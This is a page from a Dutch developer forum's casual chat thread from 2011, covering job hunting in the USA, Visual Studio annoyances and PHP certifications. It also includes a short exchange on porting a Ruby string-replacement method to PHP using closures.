  • 0 Henk 'm!

• Snake

Snake

Los Angeles, CA, USA

Om even de waarschuwing te volgen als zijnde uitlaatklep: verdikke, het is moeilijk om een job te vinden in de USA...

Acties:
  • 0 Henk 'm!

• EddoH
  • Niet online

EddoH

Backpfeifengesicht

ZaZ schreef op vrijdag 04 november 2011 @ 12:54:
[...]

Dan loopt als het goed is alleen de applicatie vol en crasht uiteindelijk omdat ie geen geheugen meer krijgt of out of stack space is oid.
Een oneindige loop kost helemaal geen rekenkracht, en een oneindige loop die een oneinde loop 'start' is ook niets mis mee, er zal per thread immers maar in loop tegelijk lopen.

Hoogstens oneindige recursie functies of het niet opruimen van gealloceerd geheugen zou een probleem kunnen zijn ;)

Acties:
  • 0 Henk 'm!

• ZaZ

ZaZ

Tweakers abonnee

Hij bedoelt volgens mij ook oneindige recursie.
Althans, zo heb ik het geïnterpreteerd.
Dat elke iteratie een nieuwe loop start, die op zijn beurt weer elke iteratie een nieuwe start etc.

Lekker op de bank

Acties:
  • 0 Henk 'm!

• CodeCaster
  • Niet online

CodeCaster

Can I get uhm...

EddoH schreef op vrijdag 04 november 2011 @ 10:13:
[...]

Ik vind het bijna moeilijk te geloven dat dat in de profesionele sw wereld voorkomt. Zulke fouten zou je een paar keer tijdens een opleiding/stage whatever kunnen maken maar als je zo software ontwerpt kun je jezelf toch geen programmeur noemen? :)
Ik verbaas me nergens meer over. Je weet hoe softwareontwikkeling werkt, zeker in wat minder gestructureerde organisaties. Code evolueert van prototype tot proof of concept tot testtool tot productie, en voor refactoring, testen en reviewen is nooit tijd.

En FUUUU Visual Studio, waarom is de "Look in"-dropdown van het Find-venster hetzelfde als die van het "Find and Replace"-venster?

Ik zocht iets de Entire Solution, een tijdje geleden, en wilde nu alle private door internal vervangen... in één klasse (had een paar functies verplaatst naar een nieuwe klasse in dezelfde namespace). En druk zonder te kijken op Alt+A. Oeps. Toen gebeurde dat dus in de hele solution. Gelukkig was één Ctrl+Z voldoende. :P

[ Voor 3% gewijzigd door CodeCaster op 04-11-2011 14:02 ]

Acties:
  • 0 Henk 'm!

• ZaZ

ZaZ

Tweakers abonnee

Snake schreef op vrijdag 04 november 2011 @ 13:17:
Om even de waarschuwing te volgen als zijnde uitlaatklep: verdikke, het is moeilijk om een job te vinden in de USA...
Daar moet je een job je toeëigenen, dan ben je een Self-Made Man
Succes hebben is een keuze.
Yeehaw!

Lekker op de bank

Acties:
  • 0 Henk 'm!

• OkkE

OkkE

Afbeeldingslocatie: http://www.favbrowser.com/wp-content/uploads/2011/11/whatisie.gif

Acties:
  • 0 Henk 'm!

• BtM909
  • Niet online

BtM909

Watch out Guys...

Waarom worden altijd de namen en foto's geblurred terwijl mensen het zelf op publieke sites neerplempen :?

Acties:
  • 0 Henk 'm!

• Jegorex
  • Laatst online: 03-09 23:24
BtM909 schreef op vrijdag 04 november 2011 @ 14:49:
Waarom worden altijd de namen en foto's geblurred terwijl mensen het zelf op publieke sites neerplempen :?
Je kunt ook aangeven dat berichten alleen voor vrienden te zien zijn, dan is het niet echt netjes om hun naam en foto met de hele wereld te delen denk ik.

Acties:
  • 0 Henk 'm!

• TJHeuvel
  • Registratie: Mei 2008
  • Niet online
BtM909 schreef op vrijdag 04 november 2011 @ 14:49:
Hoe kom je erbij dat Facebook een publieke site is? Ik kan toch niet zomaar de berichten lezen van willekeurige personen.

Freelance Unity3D developer

Acties:
  • 0 Henk 'm!

• Jeldert
  • Registratie: Juni 2001
  • Niet online

Jeldert

Rozijntjes

ZaZ schreef op vrijdag 04 november 2011 @ 12:54:
[...]

Hiermee kom je anders toch wel in de buurt: Wikipedia: Fork bomb.

Heb het wel eens getest, en ja, als je dan niet meer naar je browser kan switchen voor de oplossing, moet je toch maar resetten :o

Juist

Acties:
  • 0 Henk 'm!

• Alex)
Rutix schreef op vrijdag 04 november 2011 @ 12:48:
[...]

Zo erg faal je niet hoor :). Je bent er teminste achter gekomen :P beter dan mensen die het erin hebben zitten en waar het word misbruikt :D
Dat is waar :Y

CSRF-mitigation lijkt te werken... zodra ik met de cookie of de waarde op de page tamper is de boel invalid en krijg ik een exception. Nu nog op de plaatsen waar het ertoe doet de validatie toepassen (wat gelukkig niets meer is dan een losse method call) :)

Acties:
  • 0 Henk 'm!

• Hillie
  • Registratie: Januari 2000
  • Laatst online: 15:58

Hillie

Poepen = ultieme ontspanning

Dat hangt ervan af. Als je een van de vele potentiele immigranten bent, dan kun je aansluiten in de rij Indiers en Chinezen die ook willen. Als je hier (ik zit in de VS) zit met een greencard of een EAD als je in de eindfase zit, dan kun je makkelijker rondkijken. Momenteel zijn er een hoop vacatures hier, dus je kunt redelijk snel aan de bak als je uitgangssituatie goed is. De vraag is dan, is die goed?

Waar zit je? Wat wil je? Waarheen wil je? Wat kun je? Wat voor opleidingsniveau heb je? Waarom zou men nu juist jou over moeten laten komen (als je van buiten de VS komt)?

Liefhebber van schieten en schijten. Ouwehoer en niet-evangelisch atheist.

Daniel36: Dat zeg ik(?) Nee, dat zeg ik niet, je hebt gelijk.

Acties:
  • 0 Henk 'm!

• Snake

Snake

Los Angeles, CA, USA

Hillie schreef op vrijdag 04 november 2011 @ 23:31:
[...]

Dat hangt ervan af. Als je een van de vele potentiele immigranten bent, dan kun je aansluiten in de rij Indiers en Chinezen die ook willen. Als je hier (ik zit in de VS) zit met een greencard of een EAD als je in de eindfase zit, dan kun je makkelijker rondkijken. Momenteel zijn er een hoop vacatures hier, dus je kunt redelijk snel aan de bak als je uitgangssituatie goed is. De vraag is dan, is die goed?

Waar zit je? Wat wil je? Waarheen wil je? Wat kun je? Wat voor opleidingsniveau heb je? Waarom zou men nu juist jou over moeten laten komen (als je van buiten de VS komt)?
Mag ik je eens dm-en? O-)

Acties:
  • 0 Henk 'm!

• Hillie
  • Registratie: Januari 2000
  • Laatst online: 15:58

Hillie

Poepen = ultieme ontspanning

Tuurlijk :)

Liefhebber van schieten en schijten. Ouwehoer en niet-evangelisch atheist.

Daniel36: Dat zeg ik(?) Nee, dat zeg ik niet, je hebt gelijk.

Acties:
  • 0 Henk 'm!

• .oisyn
  • Laatst online: 13:06

.oisyn

Moderator Devschuur®

Demotivational Speaker

Ik kan hier anders zo aan de slag hoor. Kwestie van skills en de juiste mensen kennen :). Niet dat ik hier zou willen werken though. De VS zuigt.

[ Voor 9% gewijzigd door .oisyn op 06-11-2011 01:57 ]

Give a man a game and he'll have fun for a day. Teach a man to make games and he'll never have fun again.

Acties:
  • 0 Henk 'm!

• CodeCaster
  • Niet online

CodeCaster

Can I get uhm...

!@# heb ik voor Battlefield 3 een nieuwe ATI-driver geïnstalleerd, is daardoor de WPF-rendering totaal b0rked. Dat levert koppijn op met staren naar Visual Studio. :+

Acties:
  • 0 Henk 'm!

• Ryur
  • Registratie: December 2007
  • Laatst online: 19:50
CodeCaster schreef op zondag 06 november 2011 @ 10:42:
!@# heb ik voor Battlefield 3 een nieuwe ATI-driver geïnstalleerd, is daardoor de WPF-rendering totaal b0rked. Dat levert koppijn op met staren naar Visual Studio. :+
Moet je ook niet staren, maar gaan werken!

Acties:
  • 0 Henk 'm!

• CodeCaster
  • Niet online

CodeCaster

Can I get uhm...

:P

Maar het is al gefixt, AA & AF stond niet op "laat de applicatie bepalen", dus ging de videokaart tekst ook maar even antialiasen. :P

Acties:
  • 0 Henk 'm!

• Gamebuster
Code porten van Ruby naar PHP.

Conclusies zover:
PHP moet dood.

Ruby:
1
2
3
4
5
6
        def replace( string )
            string.gsub(replacement_regexp) do
                m, r = *get_match_and_replacement( $~ )
                execute_replacement_with_match r, m
            end
        end

PHP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php

public function replace( $string )
    {
        // very, very dirty hack because PHP sucks.
        $GLOBALS["__will_scan_string_instance"] = $this;
        $result = preg_replace_callback($this->get_replacement_pattern(), function($match)
        {
            global $__will_scan_string_instance;
            list($match, $replacement) = $__will_scan_string_instance->get_match_and_replacement($match);
            return $__will_scan_string_instance->execute_replacement_with_match( $replacement, $match );
        }, $string);
        return $result;
    }

?>

[ Voor 13% gewijzigd door Gamebuster op 06-11-2011 13:48 ]

Acties:
  • 0 Henk 'm!

Verwijderd

Bedoel je dat het passen van een referentie naar $this als argument van die closure niet werkt?
Of dat je vindt dat $this ook daarbinnen automatisch al beschikbaar had moeten zijn?

Acties:
  • 0 Henk 'm!

• Gamebuster
Verwijderd schreef op zondag 06 november 2011 @ 13:50:
Bedoel je dat het passen van een referentie naar $this als argument van die closure niet werkt?
Kan dat? :P

Ik zit nu dus $this in de global scope te gooien zodat-ie binnen mijn "closure" *kuchNormaleGlobaleFunctieMetRandomNaamkuch* gebruikt kan worden.

edit:
ow wacht, het lijkt zowaar een echt Closure object te zijn. Wat een vooruitgang :P

[ Voor 13% gewijzigd door Gamebuster op 06-11-2011 13:56 ]

Acties:
  • 0 Henk 'm!

• hostname
  • Laatst online: 17-09 17:56
Gamebuster schreef op zondag 06 november 2011 @ 13:48:
Code porten van Ruby naar PHP.

Conclusies zover:
PHP moet dood.

[..]
Wat dacht je van dit?

PHP:
1
2
3
4
5
6
7
8
9
public function replace($string) 
{
   $obj = $this;
   return preg_replace_callback($this->get_replacement_pattern(), function ($match) use ($obj) 
   {
      list($match, $replacement) = $obj->get_match_and_replacement($match);
      $obj->execute_replacement_with_match($replacement, $match);
   }, $string);
}

Vanaf PHP 5.4 kan je zelfs ook gewoon $this gebruiken zonder hem in een temp variable te zetten.

Je kan veel slechte dingen zeggen over PHP maar dit is er imo niet een van. Het probleem hier is eerder dat jij niet alle features kent van de taal die je gebruikt ;)

Acties:
  • 0 Henk 'm!

• Gamebuster
hostname schreef op zondag 06 november 2011 @ 14:18:
[...]

Wat dacht je van dit?

PHP:
1
2
3
4
5
6
7
8
9
public function replace($string) 
{
   $obj = $this;
   return preg_replace_callback($this->get_replacement_pattern(), function ($match) use ($obj) 
   {
      list($match, $replacement) = $obj->get_match_and_replacement($match);
      $obj->execute_replacement_with_match($replacement, $match);
   }, $string);
}

Vanaf
Yeah 8)
PHP 5.4 kan je zelfs ook gewoon $this gebruiken zonder hem in een temp variable te zetten.

Je kan veel slechte dingen zeggen over PHP maar dit is er imo niet een van. Het probleem hier is eerder dat jij niet alle features kent van de taal die je gebruikt ;)
Toby-Hinloopens-MacBook-Pro:php-y-code hinloopen$ php -v
PHP 5.3.6

:(

Overigens, ik heb de versie van de server niet eens gecheckt :P *gaat even snel checken*
Zit wel leuk closures te gebruiken, maar als het PHP 5.2 is, ben ik nog verder van huis.

edit:
PHP Version 5.3.8

[ Voor 10% gewijzigd door Gamebuster op 06-11-2011 14:29 ]

Acties:
  • 0 Henk 'm!

• .oisyn
  • Laatst online: 13:06

.oisyn

Moderator Devschuur®

Demotivational Speaker

Conclusie: mensen die conclusies trekken op basis van ongeïnformeerdheid moeten dood :Y)

Give a man a game and he'll have fun for a day. Teach a man to make games and he'll never have fun again.

Acties:
  • 0 Henk 'm!

• Hoogie2004
  • Registratie: Mei 2005
  • Laatst online: 14:30

Hoogie2004

Whohooooo

Waar is het weekend... huh? Maandag, wat? pffffffffff

* Hoogie2004 heeft dit weekend mogen werken

My iRacing profile | Strava

Acties:
  • 0 Henk 'm!

• Alex)
Afbeeldingslocatie: http://xkcd.nl/dMD/s-d2d358c47336

Goedemorgen Intel. :')

Edit: en precies nadat ik dat screenshot hier post, wordt de software wakker en toont hij me dat ik inderdaad ben verbonden met het Guest-netwerk. :*)

[ Voor 49% gewijzigd door Alex) op 07-11-2011 10:40 ]

Acties:
  • 0 Henk 'm!

• Davio
  • Registratie: November 2007
  • Laatst online: 06-01 16:46
Ik ben van plan om (hopelijk) voor het eind van het jaar mijn MCPD 70-511: Windows Application Development with Microsoft .NET Framework 4 te halen.

Is er hier iemand die hem heeft die er wat over kan zeggen of over MS certificeringen in het algemeen? Ik ben gewoon benieuwd naar jullie ervaringen. Hoe zijn de examens? Heb je gewoon het boek gevolgd of nog wat andere tools ingeschakeld?

Heb je gelijk alle certificeringen in de lijst gedaan of er gewoon één gehaald?
Pagina: 1 ... 15 ... 267 Laatste

Dit topic is gesloten.

Let op:
Dit topic is niet de plaats om te lopen helpdesken. De Coffee Corner is primair bedoeld als uitlaatklep voor iedereen in de Devschuur® en niet als vraagbaak.